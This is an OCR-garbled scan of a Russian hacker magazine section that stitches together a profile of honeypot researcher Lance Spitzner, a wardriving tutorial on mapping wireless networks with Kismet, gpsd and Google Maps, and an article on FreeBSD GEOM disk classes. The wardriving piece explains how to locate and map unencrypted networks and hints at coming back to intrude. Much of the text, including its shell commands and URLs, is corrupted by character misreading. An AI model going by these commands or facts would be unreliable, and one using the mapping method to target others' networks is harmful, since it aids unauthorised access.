Еще в школьном возрасте Лэнс Спитзнер устроил- 
ся на работу в консалтинговую компанию, которой 
как раз нужен был администратор файрвола. 
Именно в этой небольшой конторе ему пришлось 
на практике узнать, насколько уязвимы сети 
и какими приемами пользуются хакеры. Как ска- 
зал потом сам Лэнс: «Борьба с плохими парнями 

п і л итсшиато пиомк ППУПЖЯ НЯ ППЯЖеНИе С НеДРѴ" 



на различных хакерских конференциях, таких 
как ВІаск Наі ВгіеТіпдз. А статьи его выходили как 
в специализированных изданиях: Зесигііу Росиз, 
СПіеТ Зесигііу СШісег тадагіпе, так и в популярных 
журналах: ВВС, Ыеѵѵ ѴогкТітез, ѴѴаІІ ЗігееЫоигпаІ. 



ХОББИ 

Практически все свое время Лэнс уделяет ком- 
пьютерам, проводя за монитором по 1 0 — 1 5 часов 
в день. Но вместе с тем он старается не зацик- 
ливаться только на этом и любит периодически 
прогуливаться вместе со своей женой по улицам ^ 
города. Сейчас он занимается воспитанием своей 
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«МЕНЯ ВСЕГДА ВОСХИЩАЛИ ЛЮДИ, КОТОРЫЕ ВНОСЯТ 
ВКЛАД В 5ЕСІІВІТѴ СОММУШТУ, НЕ ТРЕБУЯ НИЧЕГО 
ВЗАМЕН. ЭТО ДЭН ФАРМЕР И ВИЦ ВЕНЕМА, УТИЛИТЫ 
КОТОРЫХ ПОРАЖАЮТ СВОИМ ДИЗАЙНОМ И ЭФФЕК- 
ТИВНОСТЬЮ; ДЭВИД ДИТРИХ, ПОСТОЯННО РАСШИРЯ- 
ЮЩИЙ ГРАНИ КОМПЬЮТЕРНОЙ ЭКСПЕРТИЗЫ; МАРТИ 
РОХ — АВТОР МОЩНЕЙШЕЙ УТИЛИТЫ, ДОСТУПНОЙ 
ВСЕМ БЕСПЛАТНО; К2, ВСЕ ВРЕМЯ НАПОМИНАЮЩИЙ 
МНЕ, ЧТО ТЫ НИКОГДА НЕ МОЖЕШЬ ЧУВСТВОВАТЬ 
СЕБЯ В ПОЛНОЙ БЕЗОПАСНОСТИ; ИГР, РАСШИРЯЮ- 
ЩИЙ ГРАНИЦЫ ВОЗМОЖНОГО; БРЭД ПОВЕЛ — ОТЛИЧ- 
НЫЙ ПРИМЕР ТОГО, КАКИМ ДОЛЖЕН БЫТЬ НАСТОЯ- 
ЩИЙ ПРОФЕССИОНАЛ» 





ПРОЕКТЫ 

Главным проектом, благодаря которому Лэнс 
стал известен в зесигііу соттипііу, является Тбе 
Нопеупеі Ргоіесі ( ѵѵѵѵѵѵ.бопеѵпеІ.огп Ѵ Это между- 
народная некоммерческая организация, нацелен- 
ная на повышение общего уровня безопасности 
в интернете без затраты денежных средств. Ос- 
нован проект был Спитзнером в июне 2000 года 
и сейчас насчитывает 30 мемберов, большинство 
из которых — компьютерные эксперты мирового 
уровня. Как сказал Лэнс, занимающий пост ди- 
ректора ТНР, к созданию проекта его подтолкнул 
недостаток знаний о психологии компьютерных 
взломщиков. Ведь с помощью ханипотов можно 
успешно изучить как поведение, так и способы 
проникновения блэк-хэтов. Все, что удается 
узнать о «плохих парнях», участники проекта 
выкладывают в свободный доступ. 

Самой известной печатной работой Лэнса 
является нашумевший цикл «КпоѵѵУоиг Епету» 

(в переводе его можно найти на Ьиаігад.т ). 

В первой статье подробно рассматриваются 
способы и утилиты, которыми пользуются 
скрипткидисы для совершения сетевых атак. 
Вторая рассказывает о том, как правиль- 
но анализировать логи для определения 
действий хакера. В третьей читатель узнает 
о возможных последствиях атаки, о том, как 
взломщики скрывают свои следы. В четвертой 
объясняется, как собрать исчерпывающую 
инфу о незваном госте после его вторжения. 

В пятой описываются мотивы киберпре- 
ступников. Шестая посвящена пассивному 
определению типа операционной системы. 

В седьмой дается введение в технологию 
бопеупеіз. 



НопеуроІ5 

Тгаскіщ Нйскеп 



Іапсе $рі 




В 2002 году вышла первая книга Лэнса Спитзнера 
«Нопеуроіз: Тгаскіпд Наскегз», в которой автор 
изложил весь накопленный опыт и знания. Она 
стала первой в своем роде и до сих считается 
одной из лучших книг по компьютерной безопас- 
ности вообще. НС 
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СОСТАВЛЯЕМ БЕСПРОВОДНУЮ КАРТУ ГОРОДА 
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В НАШЕМ ЖУРНАЛЕ МНОГО И ПОДРОБНО ПИСАЛИ ПРО ОБНАРУЖЕНИЕ БЕСПРОВОДНЫХ СЕТЕЙ И СООТВЕТСТВУЮЩИЙ ИНС- 
ТРУМЕНТАРИЙ ВАРДРАЙВЕРА-ЮНИКСОИДА («ХАКЕР» #074, #084, «СПЕЦ» #59). ЕСЛИ ТЫ ЧИТАЛ ЭТИ СТАТЬИ, ТО ЗНАЕШЬ, КАК 
МОЖНО ОБНАРУЖИВАТЬ БЕСПРОВОДНЫЕ СЕТИ, ПРЕОДОЛЕВАТЬ СЛАБОЕ ШИФРОВАНИЕ И АНАЛИЗИРОВАТЬ ТРАФИК. ТЫ УЖЕ 
ОБЗАВЕЛСЯ ПАРОЙ-ТРОЙКОЙ БЕСПРОВОДНЫХ КАРТ НА ВСЕ СЛУЧАИ ЖИЗНИ, КУПИЛ МОЩНУЮ ВНЕШНЮЮ АНТЕННУ И УСТАНО- 
ВИЛ ПОСЛЕДНИЕ ВЕРСИИ КІ5МЕТ, ѴѴІРЕ5НАРК И АІРСРАСК. БЕЗ ВНИМАНИЯ ОСТАЛСЯ Л ИШЬ ВОПРОС ВИЗУАЛИЗАЦИИ ДАННЫХ, 
СОБРАННЫХ В РЕЗУЛЬТАТЕ «БОЕВЫХ ВЫЕЗДОВ». ЭТОТ ПРОБЕЛ МЫ СЕЙЧАС И ВОСПОЛНИМ. 



О Беспроводная география 

оездив по городу, вардрайвѳр 
обнаружил внушительное 
количество открытых сетей 
с уверенным сигналом и вкус- 
ными ЗЗЮ'ами (вроде МедаВапкѴѴіРі или 
ІпіегпаІСогрога^еѴѴЕАЫ) и собрал огромный 
дамп логов КізтеЕ Но где эти сети рас- 
положены? Как их найти? Без привязки 
к географическим координатам от работы 
вардрайвера пользы мало. О'кей, мы в кур- 
се, что настоящий вардрайвер собирает 
информацию из чисто спортивного интереса 
и возвращаться для проникновения в сеть не 
будет. Но если целью воздушного охотника 
является нечто большее, чем просто факт 
обнаружения сети, то без привязки к карте 
города ему не обойтись. Таким образом, 
к стандартному арсеналу вардрайвера 



— ноутбук, беспроводная карта (например, 
форм-фактора РСМСІА), внешняя антенна 
(опционально) и беспроводной сниффер 
(в нашем случае это Кізтеі) — добавляется 
ОРЗ-приемники софт для наложения обна- 
руженных сетей на карту города. 

□ Позиционируемся глобально 

С ОРЗ-приемником все предельно просто. 

В 90% случаев это будет устройство марки 
Оаптііп — ими завалены прилавки компью- 
терных магазинов. При выборе учти две 
вещи: формат, в котором устройство выдает 
информацию о координатах, и интерфейс 
подключения к компьютеру. Как правило, 
большинство моделей имеют зегіаі-интер- 
фейс, и в этом нет ничего хорошего, ведь 
ноутбуки давно не оснащают этим устарев- 
шим интерфейсом. В таком случае придется 



дополнительно раскошелиться на шнурок 
сот2изЬ. Хотя последние модели ОРЗ-при- 
емников наделены ЕІЗВ-интерфейсом, обыч- 
но такие устройства дорогие, так как имеют 
большой цветной экран, внушительный 
объем памяти и прочие излишества, без ко- 
торых вардрайвер спокойно может обойтись 
(у него для всего этого есть компьютер). 

Что же касается формата выводимых 
данных, то лучше всего, если устройство 
поддерживает стандартный формат 
ЫМЕА0183. В более дешевых приемниках 
формат жестко вшит, в более дорогих — на- 
страивается в опциях меню. 

Вопреки распространенному мнению, Кізтеі 
напрямую не поддерживает работу с ОРЗ. 
Для сопряжения приемника и сниферанам 
понадобится демон дрзб ( арзсІ.ЬегІіоз.сІе ). 
который майнтейнит сам Эрик Реймонд ;). 
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> Вардрайверский джип: на крыше антенна с усилением 21 сіВі 



Этот демон вешается на порт ОРЗ-приемника 
и слушает ТСР-порт (по умолчанию 2947). 
Именно через этот порт и происходит обмен 
информацией между дрзб и КізтеТ 
В моем случае ОРЗ-приемником был Оагтіп 
еТгехѴізіас зегіаі-интерфейсом и сот2изЬ- 
адаптером. Чтобы система опознала девайс, 
следует подгрузить нужный модуль (их много: 
исот, исусот, ирісот, иѵзсот, в зависимос- 
ти от чипсета адаптера): 

# кібіоаб ирісот. ко 

Если ты перепробовал все модули, но в ответ 
на подключение девайса система выдает 
лишь неутешительные сообщения о том, 
что к ней подключили что-то неизвестное 
и псевдоустройство /беѵ/сиаІІО не создает- 
ся, то хочу тебя огорчить — твой сот2изЬ-ка- 
бель не подходит. В тап-страницах модулей 
указаны названия адаптеров, с которыми они 
работают. 

В нашем случае все прошло успешно 
и приемник подцепился как /беѵ/сиаІІО. 
Именно на этот девайс мы и натравливаем 
дрзб (в этом примере демон не уходит в бэ- 
кграунд и выдает на консоль отладочные 
сообщения): 



# дрзб -Ы -Ц 10 /беѵ/сиаШ) 

Далее настраиваем Кізтеі для работы 
с дрзб: 



# ѵі /изг/іосаі /екс/кізтеі: . сопТ 



дрз=1гие 

дрз!юз1=1оса1]іозк:2947 

После этого запускаем Кізтеі: 

$ сб /Стр 
# кізтеі 

И убеждаемся, что он подхватил ОРЗ: внизу, 
под списком сетей, теперь указываются 
текущие ОРЗ-координаты, а среди логов, 
сохраняемых снифером, появился новый, 
с расширением ОРЗ. 

□ Карты в руки 

Кізтеі не только является превосходным 
пассивным снифером, но еще и работает 
с картами местности! Точнее, не сам КізптеТ 
а утилита дрзтар, входящая в состав дист- 
рибутива. Она умеет обрабатывать ОРЗ-логи 
и накладывать обнаруженные сети на карту, 



5РВ ПОД КОЛПАКОМ 



ш 



Визуализация обнаруженных 
сетей — это хорошо. Но хочется 
большего. Если есть информация 
по сетям, сразу воз ни кает желание 
занести их в базу данных, сделать 
поиск по идентификатору и типу 
сети, наличию шифрования. Так как 
у настеперь есть ОРЗ-координаты, 
то мы, используя простой скриптик, 
сможем показывать лишьте сети, 
которые находятся в определенном 
месте, районе города и т. п. 

Именно этим я и озадачился :). 

По адресу ѵѵѵѵѵѵТохаІіозЕги/ѵѵіббЬ 
расположен мой проект по сбору 
информации о беспроводных сетях 
Санкт-Петербурга. Для визуализа- 
ции данных в нем как раз применя- 
ется описанный здесь метод. 
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> Пойманные точки на экране ноутбука 



добавляя, помимо информации о сети, такие 
полезные фишки, как трек-линия (путь, на 
протяжении которого сеть была доступна) 
и вычисленный на ее основе примерный 
район охвата сети. 

Картинка с картой — это здорово, но мы 



пойдем еще дальше и вместо статичной 
картинки с помощью НТМІ_ и ^ѵаЗсгірі 
сделаем динамичную карту, на которой будут 
изображены точки доступа, обозначенные 
разным цветом в зависимости от уровня за- 
щищенности (без шифрования вообще, со 



слабой защитой в виде ѴѴЕР и с хорошей за- 
щитой). При нажатии на каждую такую точку 
на карте, скрипт будет выдавать подробную 
информацию о сети и рисовать район охва- 
та сети с трек-линией. Карты же возьмем из 
публичного источника — Ооодіе Марз. 
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^ ипіхоігі 




> Информация о сети, трек-путь и примерный район охвата 



> Питер, опутанный незащищенных беспроводными сетями 







_ВП ***** 



> Мне сверху видно все, ты так и знай! 



> Видно, по какому маршруту ехал вардрайвер 



Поможет нам в этом дптар — патч к дрзтар, 
добавляющий вышеописанную функци- 
ональность. Подружить Кізтеі: и Ооодіе 
Марз очень просто. Для этого нам по- 
надобятся исходники Кізтеі: (а именно 
— дрзтар) и архив с ѵѵѵѵѵѵ.рагкпаііоп.сот/ 
дтар . содержащий сам патч и біті-интер- 
фейс. Далее следует пропатчить и собрать 
дрзтар, как показано ниже: 

$ -р ммм.рагкпаРіоп . сот/дтар/ 
Іііез /дрзтар- дтар- 0.1. кд 2 
$ ккр -р кізтекмігеіезз .пек/собе/ 
кізтек-2006-04-К1 .Раг .дт. 

$ Раг х 2 Р дрзтар-дтар-О.І.каг.дг 
$ Раг х 2 Р кізтеР-200б-04-К1.Раг.дг 
$ ссі кізтеР-200б-04-К1 
$ раксЪ. -рО <. ./дрзтар-дтар-0.1/ 
дрзтар -дтар -0 . 1 .біРР 
$./сопіідиге 
$ таке дрзтар 

Пользователям ЕгееВЗЭ проще использо- 
вать систему портов, так как порт Кізтеі: был 



доработан автором этих строк и патч можно 
включить в опциях, набрав: 

$ ссі /изг/рогРз/пеР-тдтР/кізтеР 
# таке сопіід 

Пропатченную утилиту необходимо натра- 
вить налоги Кізтеі с расширением дрз: 



$ дрзтар щ -е -Р -г -и -пі *.дрз 

После этого нужно определиться, куда 
выкладывать результаты своей работы. 

Как упоминалось выше, результат работы 
пропатченной дрзтар — нестатичная кар- 
тинка. На выходе тулза генерирует із-файл 
(тар_*4з), который следует переименовать 
в дрзбаіа.із и расположить в каталоге 
веб-сервера вместе с іпсіех.іііппі и папкой 
таріііез/ (их можно найти в архиве с патчем). 
Последний шаг — получить у Ооодіе Марз 
код для своего сайта, на котором расположе- 
ны результаты работы, ведь карта местности 
закачивается с сервера Ооодіе. Сделать это 



можно по адресу ѵѵѵѵѵѵ.аооаіе.сот/аріз/тарз/ 
зіапир.ігіті . Полученный код следует вписать 
в іпбех.ітіті прямо под соответствующим 
комментарием (КЕѴНЕПЕ). 

В результате, натравив браузер с включен- 
ной поддержкой Оаѵа-скриптов на 
ѵѵѵѵѵѵ.ѵоигзегѵег.ги/ѵѵііітар (при условии, что 
іпсіех.іііппі, дрзсіаіа.ізи таріііез/ расположены 
в папке ѵѵіТітар/), ты получишь свой малень- 
кий вариант Ооодіе Марз с нанесенными на 
карту точками доступа. Красные точки озна- 
чают сети без шифрования данных, желтые 
— с включенным ѴѴЕР, зеленые — с адек- 
ватными методами защиты данных. Щелкнув 
по точке, во всплывающем окошке увидишь 
всю информацию о сети, сможешь нарисо- 
вать трек-линию и примерный район охвата. 
Это гораздо практичнее, функциональнее 
и эффектнее статичной іред-картинки. Вид 
родного города с высоты птичьего полета, 
визуально опутанного сотнями беспроводных 
сетей, производит впечатление даже на не- 
сведущих в ѴѴіРі людей ;). Пример такой карты 
есть на ѵѵѵѵѵѵ.іохаітозі.ги/ѵѵагбгіѵіпд зрЬ/аІІ . □С 
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ТЕХНОЛОГИЯ ОЕОМ ИЗНУТРИ И СНАРУЖИ 

ТЕХНОЛОГИЯ ОЕОМ СТАЛА ОДНИМ ИЗ ГЛАВНЫХ НОВОВВЕДЕНИЙ ЕРЕЕВЗБ ЗА ПОСЛЕДНИЕ ГОДЫ. БЛАГОДАРЯ МОДУЛЬНОЙ АР- 
ХИТЕКТУРЕ И ГРАМОТНОМУ ДИЗАЙНУ МЕХАНИЗМ ОЕОМ ПОЗВОЛИЛ В ПОЛНОЙ МЕРЕ КОНТРОЛИРОВАТЬ ПРОЦЕСС ОБМЕНА ДАН- 
НЫМИ МЕЖДУ ЖЕСТКИМ ДИСКОМ И ФАЙЛОВОЙ СИСТЕМОЙ. ПОЛЬЗОВАТЕЛИ И АДМИНИСТРАТОРЫ ПОЛУЧИЛИ В РАСПОРЯЖЕ- 
НИЕ МОЩНЫЙ ИНСТРУМЕНТ, ОТКРЫВАЮЩИЙ ШИРОЧАЙШИЕ ВОЗМОЖНОСТИ ПО ОРГАНИЗАЦИИ ХРАНИЛ ИЩ ДАННЫХ ЛЮБОЙ 
СЛОЖНОСТИ. 



□ Философия ОЕОМ 

ОЕОМ (модульный механизм 
преобразования запросов дис- 
кового ввода-вывода) представ- 
ляет собой прослойку между 
файловой системой и драйвером накопителя 
(АТА, ЗАТА, 5СЗІ). В основу механизма 
положена идея обособленных модулей 
(в терминологии ОЕОМ — классов), каждый 
из которых может выполнять только один вид 
преобразования. Запрос дискового ввода- 
вывода, проходя через модули, подверга- 
ется различной обработке и в конце пути 
попадает в драйвер устройства. Комбинируя 
модули, пользователь получает возможность 
работать с различными дисковыми разде- 

/ ііб 



лами, создавать логические тома и програм- 
мные ПАЮ-массивы. 

Немаловажная особенность ОЕОМ — это 
простота разработки классов. Для созда- 
ния нового вида преобразования доста- 
точно оформить алгоритм в виде класса, 
добавить необходимые структуры данных 
и скомпилировать код как модуль ядра. 
После этого модуль можно подключить 
к ядру и добавить экземпляр класса к су- 
ществующей топологии. Надо сказать, что 
простота дизайна и дружелюбность к раз- 
работчикам сыграли свою роль. В РгееВЗБ 
версии 6.1 доступно более 20 классов, 
и с каждым релизом их будет становиться 
все больше. 



КЛАССЫ СЕ ОМ, ДОСТУПНЫЕ В ЕВЕЕВЗО 6.1 

Работа с разделами: 

тЪг — делит диск на слайсы; 

дрр — делит диск на слайсы формата 

СІІЮ (формат разделов ІА- 64) ; 

арріе — делит диск на слайсы формата 

Арріе; 

зипІаЬеІ — делит диск на слайсы фор- 
мата Зип ОрепВооб РВОМ (используется 
в серверах Зип) ; 

рс98 — делит диск на слайсы формата 
РС98; 

Ъзб — делит слайс на разделы ВЗО. 

ВАІБ и логические тома: 

сопсаб — объединяет несколько дисков 
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> іозіа* — на помойку, да здравствует дзіаі! 



в один логическим дисковым раздел; 
зкгіре — создает массивы КАІЭ-0 (че- 
редование) ; 

гпіггог — создает массивы КАІЭ-1 (зер- 
калирование) ; 

гаісіЗ — создает массивы КАІО-3 (чере- 
дование с контролем четности) ; 
ссб — создает массивы КАІЭ-0 и КАІБ-1; 
ѵіпит — менеджер логических томов 
ѵіпит, как класс СЕОМ. 



эезопасность : 



дЪбе — осуществляет шифрование на 
уровне диска; 

деіі — другой вариант шифрования; 
зкзес — реализует «зкагеб зесгек 
беѵісез», когда для того чтобы по- 
лучить доступ к одному накопителю, 
необходимо обеспечить наличие другого 
накопителя, например ИЗВ-флешки . 



Сиі 



:с темные : 



сіеѵ — создает файлы устройств в ката- 
логе /беѵ. 

ѵкз — связывает СЕОМ и подсистему ѴЕ5 . 
сіізк — работает с драйвером диска. 



Другое : 

ІаЪеІ — позволяет управлять дисковы- 
ми разделами с помощью специальных 
меток; 

кох — специальный класс, автомати- 
чески перенаправляющий цепь запросов 
с одного накопителя на другой; 
дабе — позволяет создать накопитель 
как пользовательский процесс; 
пор — предназначен для тестирования 
других классов и сбора статистики; 
игір — позволяет читать сжатые образы 
дисков; 

гего — класс реализует виртуальный 
накопитель, содержащий нули (по ана- 
логии с /беѵ/гего) . 



Все классы, за исключением системных, 
которые должны присутствовать в любой 
топологии ОБОМ, могут быть подключены как 
модули ядра. Классы, работающие с разде- 
лами, по умолчанию включены в ядро, причем 
без крови их оттуда не извлечешь — через 
конфигурационный файл ядра это осущест- 
вить не удастся. Так сделано для того, чтобы 



ядро путем перебора классов (существуют 
правила, благодаря которым ОБОМ спосо- 
бен производить автоконфигурирование), 
смогло создать стандартную топологию и не 
выпасть во время инициализации в 
кегпеі рапіс. 

Классы сссі и ѵіпит достались РгееВЗО в на- 
следство от четвертой ветки, в которой они 
были реализованы как отдельные механизмы 
ядра и являлись чуть ли не единственным 
средством создания РАЮ и логических 
томов. По сути, это реликты, пережитки 
прошлого, импортированные в ОБОМ по 
просьбам ветеранов РгееВЗО и от нежелания 
выбрасывать отлаженный код. Даже ѵіпит, 
при всей своей мощи и универсальности, 
в большинстве случаев может быть заменен 
комбинацией других классов, гораздо более 
удобных в настройке. 

□ Долой невнятные названия дисков! 

РІаверняка тебе приходила в голову мысль, 
что было бы гораздо удобнее монтировать 
файловые системы, указывая в аргументах 
команды тоипі и в файле /еісДзіаЬ легко 
читаемые и прозрачные имена дисков, вроде 
/сІеѵ/Ьоте или /сіеѵ/изг. Если так, хочу тебя 
обрадовать, класс ІаЬеІ позволяет сделать 
именно это. Принцип его работы основан на 
понятии метки тома, которая является непре- 
менным атрибутом большинства файловых 
систем. 

Приведу пример. Имеется раздел /беѵ/асІОзІ е, 
на котором создана файловая система иіз2, 
содержащая каталог /Йоте. Попробуем 
смонтировать ее: той пШеѵ/асІОзІ е/Ноте. 
Одна команда и две проблемы: во-первых, 
имя файла никак не говорит о том, что нахо- 
дится на этом разделе, а во-вторых, в случае 
перемещения диска имя файла изменится, 
и придется править /еісДзіаЬ. А теперь сдела- 
ем то же самое с использование класса ІаЬеІ: 

# кісііоасі деот_1аЪе1 

# шпоипк /коте 

# кипекз -Ь коте /беѵ/асіОзІе 

# тоипк /беѵ/икз/коте /коте 

Стало намного приятнее для глаз. Даже если 
переключить диск на второй ЮЕ-канал, метка 
будет распознана и файл /сІеѵЛЛзДіоте 
останется ассоциированным с прежним раз- 



делом. Также класс ІаЬеІ умеет распознавать 
метки файловых систем РАТ (/сіеѵ/тзсіозіз/), 
1309660 (/сІеѵ/ізо9660/), ЕХТ2 (/беѵ/ехі2із/), 
ВеізегРЗ (/беѵ/геізеДз/) и ЫТРЗ (/сІеѵ/пДз/). 
Кроме того, допустимо использование меток, 
не связанных с файловыми системами (ко- 
манда «діабеі сгеаіе имя-метки устройство»). 

□ ѲгіркакклассОЕОМ 

На сегодняшний день не существует класса, 
выполняющего прозрачное сжатие и распа- 
ковку данных в реальном времени. Но досту- 
пен класс, умеющий читать сжатые образы 
дисков, который наверняка пригодится вла- 
дельцам {ІазЬ-дисков и создателям БіѵеСО. 
Ниже приведен пример того, как можно 
создать и подключить такой образ. 

ПРИМЕР ИСПОЛЬЗОВАНИЯ КЛАССА СЕ0М_Ц2ІР 
Создаем и монтируем образ диска: 

# сісі ік=/беѵ/ 2 его ок=сИзк.икз Ьз=1к 
соипк=100к 

# тбсопйд -а -к ѵпобе -к бізк.икз -и О 

# ЪзбІаЪеІ -м тбО аико 

# пемкз -т 0 -і 1024 тбОс 

# тоипк /беѵ/тбОс /тпк 



ПАРА СЛОВ ОБ АВТОРЕ 0Е0М 

Механизм ОБОМ был спроектирован и ре- 
ализован легендарным РгееВЗО-хакером 
Полом-Хеннингом Кампом (РоиІ-Неппіпд 
Катр) при спонсорской поддержке І\ІАІ 
І_аЬз. Первая аІрЬа-версия кода была 
создана для РгееВЗО 4.9, а после выхода 
релиза 5.0 ОБОМ стал официальной 
частью ядра. На развитие и реализацию 
идеи ОБОМ автору потребовалось около 
восьми лет. Причины такой длительной 
разработки он объясняет словами: «Я 
хотел сделать это правильно». 

Пол-Хеннинг также известен как автор кода 
ѴРЗ патесасЬе, іаіі, беѵіз, дЬбе и драйве- 
ров для некоторых АТА-, ЗСЗІ- и ЫЗВ-уст- 
ройств. Ему принадлежит замечательное 
высказывание, которое он привел в пись- 
ме, анонсирующем ОБОМ: «Лучший спо- 
соб уничтожить РгееВЗО — это дать нашей 
инфраструктуре прогнить». 
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>деот_тіггог превращает процесс создания зеркал РАЮ-1 в >деот_ІаЬеІ делает работу с дисками приятной и удобной 

тривиальную задачу 




>• реорІеІгееЬзб 
ога/~рИк/ 

• рИк.кееЬзсІ.сІк/риЬз/ 
ЬзсІсап-СМ.зІісІез. 
аЬсІе.рсІі 

• рІікІгѳеЬзсІ.сІк/риЬз/ 
ЬзсІсап-СМ.зІісІез. 
аеот.рсІІ 

• рГік.кееЬзсІ.сІк/риЬз/ 
ЬзсІсап-04.5ІісІѲ5. 
аѳотіиТрсЛ 

53 МР 0 

> Многими классами 
ОЕОМ можно 
управлять с помо- 
щью стандартной 
утилиты /зЬіп/деот. 

К примеру, вместо 
команды деот тіггог 
ІоасІ можно набирать 
дтіггог ІоасІ. 

Для наблюдения за 
статистикой ввода- 
вывода воспользуйся 
утилитой /изг/зЫп/ 
дзіаі. 
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Заполняем виртуальный диск содержимым: 

# ср -К ~/боситепкз /тпк 

Отключаем образ: 

# шпоипк /тпк 

# тбсопкд -б -и О 

Сжимаем содержимое виртуального диска и вновь 
подключаем его : 

# кібіоаб деош_и 2 Ір 

# ткигір бізк.икз 

# тбсопкд -а -Р ѵпобе -Р бізк . икз . игір -и О 

# тоипР -г /беѵ/тбО . игір /тпР 

О Руки прочь от частной собственности 

В ядре РгееВЗО версии 6.1 можно найти 2 класса, 
осуществляющих низкоуровневое шифрование дисков. 
Первый называется дЬсІе (Оеопгі ВазесІ Оізк Епсгурііоп). 

Он способен шифровать диски или разделы алгоритмом 
АЕЗ с симметричным ключом длиной от 1 28 бит. Второй, 
с более запоминающимся и легко произносимым назва- 
нием деіі, более совершенен и универсален. Класс деіі 
может использовать специализированное оборудование 
для шифрования (в дЬбе поддержка такого железа не 
полная), позволяет выбирать алгоритм шифрования (АЕЗ, 
ВІоѵѵТізИ или ЗОЕЗ), использовать 2 независимых ключа 
и шифровать корневой раздел диска (во время загрузки 
пользователю будет предложено ввести пароль). 

ПРИМЕР ИСПОЛЬЗОВАНИЯ КЛАССА СЕОМ_ВОЕ 
Инициализация : 

# кісііоасі деот_Ъбе 

# дЪбе іпік. асіі 

Создаем файловую систему: 

# дЪбе аккаск асіі 

# сісі ік=/сіеѵ/гапсіот ок=/беѵ/аб1 .Ъбе Ьз=64к 

# пемкз /беѵ/абі .Ъбе 

# дЪбе бекаск абі 

Подключаем шифрованный диск: 

# дЪбе аккаск абі 

# тоипк /беѵ/абі . Ьбе/зесгек 

Класс деіі, в отличие от дЬбе, позволяет создать ключ из 
нескольких компонентов. В примере, приведенном ниже, 
мы используем пароль в комбинации с набором из слу- 
чайных байтов в качестве основы для ключа ВІоѵѵіізН. При 
необходимости файл можно переместить на ІІЗВ-флешку 
и спрятать ее в цветочном горшке. 



ПРИМЕР ИСПОЛЬЗОВАНИЯ КЛАССА СЕОМ_ЕЫ 
Инициализация : 

# кібіоаб 

# бб ік=/беѵ/гапбот ок=~/аб1 . кеу Ъз = 64 сошік=1 

# деіі іпік -з 4096 -К ~/аб1.кеу -а ВіомИзк 
/беѵ/абі 

Создаем файловую систему: 

# деіі аккаск -к ~/аб1.кеу абі 

# бб ік=/беѵ/гапбот ок=/беѵ/аб1 . еіі Ьз=64к 

# пемкз /беѵ/абі. еіі 

# деіі бекаск абі. еіі 

Подключаем шифрованный диск: 

# деіі аккаск -к ~/аб1.кеу /беѵ/абі 

# тоипк /беѵ/абі. еіі /тпк/зесгек 

Интересной особенностью класса деіі является так- 
же и то, что он способен генерировать специальные 
одноразовые ключи для шифрования разделов зѵѵар или 
временных файловых систем. Никаких источников для 
генерации ключа, будь то пароль или файл с беспорядоч- 
ным набором байтов, при этом не требуется. 

# бб ік=/беѵ/гапбот ок=/беѵ/аб0з1Ь Ьз=64к 

# деіі опекіте -б -а Збез абОзІЬ 

# змароп /беѵ/абОзІЬ . еіі 

□Дисковая магия 

К сожалению, в рамках одной статьи невозможно описать 
все возможности ОЕОМ по организации РАЮ-массивов. 
Поэтому мы остановимся только на РАЮ-1 , как наиболее 
популярном и дешевом варианте РАЮ. За создание 
томов РАЮ-1 (зеркал) отвечает класс тіггог, управляемый 
утилитой /зЬіп/дтіггог. Средствами ОЕОМ создать зеркало 
очень просто, поэтому, не вдаваясь в подробности, рас- 
смотрим пример, который будет актуален в 90% случаев: 

ПРИМЕР ИСПОЛЬЗОВАНИЯ КЛАССА СЕОМ_МІККОК 
Создаем зеркало для текущего диска: 

# дтіггог Іоаб 

# зузскі кегп . деот. беЬиді1адз=16 

# дтіггог ІаЪеІ -Ь гоипб-гоЫп дтО /беѵ/абО 

Перезапускаем тіггог, чтобы изменения вступили 
в силу : 

# дтіггог ипіоаб 

# дтіггог іоаб 
Подключаем второй диск: 

# дтіггог іпзегк дтО /беѵ/аб2 
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После подключения к зеркалу второго 
диска начнется синхронизация. Для диска 
емкостью 1 20 Гб эта операция может длиться 
до 5 часов. Строка гоипб-гоЬіп в третьей 
команде означает алгоритм балансировки. 
Доступно 4 алгоритма: 

1. І_оасІ — чтение с менее загруженного диска; 

2. ргеіег — чтение с диска, имеющего более 
высокий приоритет (чем раньше диск был 
добавлен в массив, тем выше его приоритет); 
3 гоипб-гоЫп — поочередное чтение с каж- 
дого диска (наиболее производительный 
алгоритм); 

4 . зрііі — распределение запросов на чтение 
больших объемов данных (4 Кб и более) по 
дискам (дефолтовый алгоритм). 

Чтобы зеркалирование включалось во время 
инициализации системы, необходимо дать 
указание загрузчику подключать модуль 
деоітмтііггог (есЬо деот_тіггог_ІоасІ="ѴЕ8" 

>> /Ьооі/Іоабег.соп!) и отредактировать файл 
/еісДзіаЬ таким образом, чтобы все вхожде- 
ния /беѵ/асІО были заменены /беѵ/тіггог/дтО 
(/беѵ/асІОзІа — /беѵ/тіггог/дтОзІаи т. д.). 

В любой момент к массиву может быть 
добавлен третий диск. Для удаления диска 
из массива используется команда дтіггог 
гетоѵе дтО асІ2. 

Міггог очень устойчив к сбоям. Если один из 
дисков выйдет из строя, то после перезагруз- 
ки система продолжит нормальную работу. 
После того как новый диск будет доставлен 
из магазина и подключен, тіггог автоматичес- 
ки его найдет и произведет синхронизацию. 

А в случае аварийного отключения питания 
синхронизация продолжится с прерванного 
места. ЗС 



ЗАЧЕМ ШИФРОВАТЬ РАЗДЕЛ 
5ѴѴАР? 

Некоторых читателей может озадачить 
фраза «шифрование зѵѵар-раздела». 
«Что там может быть интересного? Прос- 
то куски программ, случайные страницы 
памяти», — скажут они. И будут не правы. 
Действительно, раздел подкачки обычно 
заполнен случайными фрагментами 
кода, не уместившегося в оперативной 
памяти. Но стоит включить воображение, 
как становится ясно, что в зѵѵар также 
могут попасть фрагменты данных, содер- 
жащие конфиденциальную информа- 
цию, пароли, обрывки личного дневника 
и даже семейный секрет приготовления 
тыквенного пирога! 



АНАТОМИЯ ОЕОМ 

Механизм ОЕОМ объектно-ориентирован- 
ный. Согласно словарю ООП, модуль называ- 
ется «классом». В работающей системе для 
каждого класса может быть создан один или 
несколько «экземпляров», в обязанности 
которых как раз и входит выполнение одного 
из видов преобразования. Для каждого 
жесткого диска будет создано по одному 
экземпляру класса тЬг, делящего диск на 
слайсы (разделы в терминологии М3), для 
каждого слайса с меткой ВЗЭ — по экзем- 
пляру класса Ьзб, разбивающего слайс на 
разделы и т. д. К каждому экземпляру класса 
может быть привязан один или более «пос- 
тавщик» и «потребитель». Поставщик — это 
«главная дверь», через которую экземпляр 
представляет свои услуги, он напрямую 
связан с элементом каталога /беѵ. В случае 
